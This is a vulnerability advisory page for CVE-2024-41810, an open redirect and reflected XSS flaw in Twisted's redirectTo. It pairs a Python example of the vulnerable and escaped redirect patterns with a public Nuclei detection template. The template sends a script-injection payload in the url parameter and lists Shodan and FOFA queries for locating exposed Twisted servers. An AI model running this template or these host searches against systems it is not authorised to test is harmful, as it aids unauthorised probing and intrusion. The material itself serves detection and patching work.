CVE-2024-41810: Twisted - Open Redirect & XSS

Date: 2025-08-01 | Affected software: Twisted | PoC: public

Vulnerability description

Twisted is an event-based framework for internet applications, supporting Python 3.6+. The Twisted web framework's redirectTo function is vulnerable to reflected XSS if an attacker can control the redirect URL. The Nuclei template below tests for an open redirect and reflected XSS through the url query parameter. This vulnerability is fixed in 24.7.0rc1.
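To make the vulnerable shape and its fix concrete, here is an added illustration written for this page; it is not Twisted's own redirectTo code and does not import Twisted. It models a hypothetical redirect helper that interpolates the target URL into a "click here" HTML body unescaped (the pattern behind the reflected XSS), the hardened variant that HTML-escapes the URL, and an allow-list check that closes the open-redirect side. The body template, ALLOWED_SCHEMES, build_redirect and the sample input are all constructed for the example.

```python
"""Illustration of the redirect-body reflection pattern behind CVE-2024-41810.

Added example code for this page; NOT Twisted's redirectTo() and no Twisted
import. Shows a vulnerable redirect helper, its escaped counterpart, and an
allow-list guard against open redirects.
"""
from html import escape
from urllib.parse import urlsplit

# Hypothetical body template in the style of a "click here" redirect page.
# Both the meta refresh and the anchor interpolate the same URL.
_BODY = (
    '<html><head><meta http-equiv="refresh" content="0;URL={url}"></head>'
    '<body><a href="{url}">click here</a></body></html>'
)


def vulnerable_redirect_body(url: str) -> str:
    """Vulnerable shape: the attacker-controlled URL lands in HTML verbatim,
    so a double quote followed by a tag breaks out of the attribute."""
    return _BODY.format(url=url)


def hardened_redirect_body(url: str) -> str:
    """Hardened shape: escape &, <, >, " and ' before interpolation so the
    URL can only ever be attribute text, never markup."""
    return _BODY.format(url=escape(url, quote=True))


# Constructed policy for the example: only web schemes may be redirect targets.
ALLOWED_SCHEMES = {"http", "https"}


def is_allowed_redirect(url: str, allowed_hosts: set[str]) -> bool:
    """Open-redirect guard: accept only http(s) URLs whose host is on an
    explicit allow-list. The scheme check also rejects ws://, javascript:,
    data: and scheme-less //host forms."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False
    host = (parts.hostname or "").lower()
    return host in allowed_hosts


def build_redirect(url: str, allowed_hosts: set[str]) -> tuple[int, dict, str]:
    """Combined handler returning (status, headers, body). Disallowed targets
    get a 400 with no Location header instead of a redirect."""
    if not is_allowed_redirect(url, allowed_hosts):
        return 400, {"Content-Type": "text/plain; charset=utf-8"}, "invalid redirect target"
    headers = {"Location": url, "Content-Type": "text/html; charset=utf-8"}
    return 302, headers, hardened_redirect_body(url)


if __name__ == "__main__":
    # Constructed sample input: the same payload shape the template above sends.
    sample = 'ws://example.com/"><script>alert(document.domain)</script>'
    print(vulnerable_redirect_body(sample))   # raw <script> tag survives
    print(hardened_redirect_body(sample))     # tag is rendered as &lt;script&gt;
    print(build_redirect(sample, {"app.example.com"}))  # 400, no Location
```

Escaping alone closes the XSS but still lets the server bounce users to any host, which is why the allow-list check is kept separate: the two defenses address two different findings in the template's matchers (the reflected tag in the body and the attacker-chosen Location).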

PoC code [public]

id: CVE-2024-41810

info:
  name: Twisted - Open Redirect & XSS
  author: KoYejune0302,cheoljun99,sim4110,gy741
  severity: medium
  description: |
    Twisted is an event-based framework for internet applications, supporting Python 3.6+. The Twisted web framework's redirectTo function is vulnerable to reflected XSS if an attacker can control the redirect URL. This template tests for an open redirect and XSS vulnerability in the URL parameter. This vulnerability is fixed in 24.7.0rc1.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-41810
    epss-score: 0.49083
    epss-percentile: 0.9771
    cpe: cpe:2.3:a:twistedmatrix:twisted:*:*:*:*:*:*:*:*
  reference:
    - https://github.com/advisories/GHSA-cf56-g6w6-pqq2
    - https://nvd.nist.gov/vuln/detail/CVE-2024-41810
  metadata:
    max-request: 2
    shodan-query: html:'Twisted' html:"python"
    fofa-query: body="twisted" && "python"
  tags: xss,redirect,twisted,python

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: word
        part: response
        words:
          - "TWISTED_SESSION"
          - '["Twisted'
        internal: true

  - method: GET
    path:
      - '{{BaseURL}}?url=ws://example.com/"><script>alert(document.domain)</script>'

    redirects: true
    matchers-condition: and
    matchers:
      - type: word
        part: response
        words:
          - 'Location: ws://example.com/"><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 302
# digest: 490a00463044022003b98619d3df1b1c88822efdf58c6decfa5d7ffc46230e136b1867dd31fb49d50220696e19305d58d518073510ef65bb7f3945e58a142daab4bfc8a78eccfbc49cb8:922c64590222798bb761d5b6d8e72950